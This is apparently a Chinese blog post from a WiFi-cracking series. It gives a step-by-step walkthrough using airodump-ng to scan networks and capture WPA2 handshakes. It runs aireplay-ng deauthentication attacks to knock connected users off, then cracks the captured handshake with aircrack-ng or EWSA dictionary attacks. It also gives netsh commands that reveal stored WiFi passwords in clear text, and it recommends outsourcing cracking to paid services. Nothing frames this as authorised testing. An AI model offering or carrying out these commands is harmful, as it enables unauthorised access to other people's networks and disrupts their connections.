盘点那些Wifi破解姿势(2)
盘点那些Wifi破解姿势(1)
公众号:巡安似海盘点那些Wifi破解姿势(1)
00x1:airodump-ng:
接下来掏出我们最常见的神器:airodump-ng
还是老规矩,首先插上无线网卡
ifconfig -a 查看网卡(ifconfig 可以查看是否启用)ifconfig wlan0 up 如果没开启则执行该命令开启无线网卡airmon-ng start wlan0 开启监听模式,返回wlan0mon适配器airodump-ng wlan0mon 扫描周围wifi(如扫描不出结果,拔掉重新插入即可)此时我们可以看到wifi名称,信道,加密方式,BSSID,信号强度等信息
PWR:信号强度
CH:信道
ENC:加密方式
最下方则是有用户连接的信息,破解时建议选取存在用户连接的wifi
我们再打开一个命令窗口,抓取握手包
airodump-ng -c 2 -w wpa2 wlan0mon -c 信道 -w 保存的名称 适配器为了加快我们抓取握手包的速度,利用aireplay-ng对wifi进行攻击
aireplay-ng -0 10 -a BSSID wlan0mon -0 冲突模式 10 10次 -a 无线的bssid此时需要多执行几次,因为一直再扫描,需要信道相同时,才会进行攻击
图中当到2信道的时候,攻击了10次,迫使用户重连,抓取握手包
#此时我们有三个窗口,一个扫描周围wifi,一个抓握手包,一个攻击
如图所示,右上角出现WPA handshake则表示抓到握手包
握手包目录:/home
文件后缀:cap
接下来就要看你字典的强度了,还有你的运气
利用aircrack-ng跑包:
aircrack-ng 握手包 -w 字典成功跑到密码
00x2:windows下利用EWSA来跑包
直接把cap拖入进去
如果提示有效性,则表示包中存在密码,接下来我们就可以选择字典
建议把密码变换选项取消,默认里面是开启的,接下来点击开始破解
找到密码会自动提示,看你字典强度以及你的运气了,哈哈
如果你想让破解的速度更快,可以设置该选项
00x3:其他姿势
1)利用wifi万能钥匙
原理:当别人利用wifi万能钥匙连接后,密码则会共享
2)查看历史连接过的wifi密码
netsh wlan show profiles 查看连接过的wifi列表
netsh wlan show profiles "wifi名称" key=clear 查看密码
3)安卓的wifi分享功能
扫码后可得到wifi密码
到此,WIFI破解系列文章就结束了,讲的是一些常用的破解方法,淘宝也有很多代替跑包的,当你抓到包后,且没有过多的时间跑包,同时密码复杂,这时你就可以在网上找人帮忙跑包,这里就不打广告了,喜欢的给个赞叭。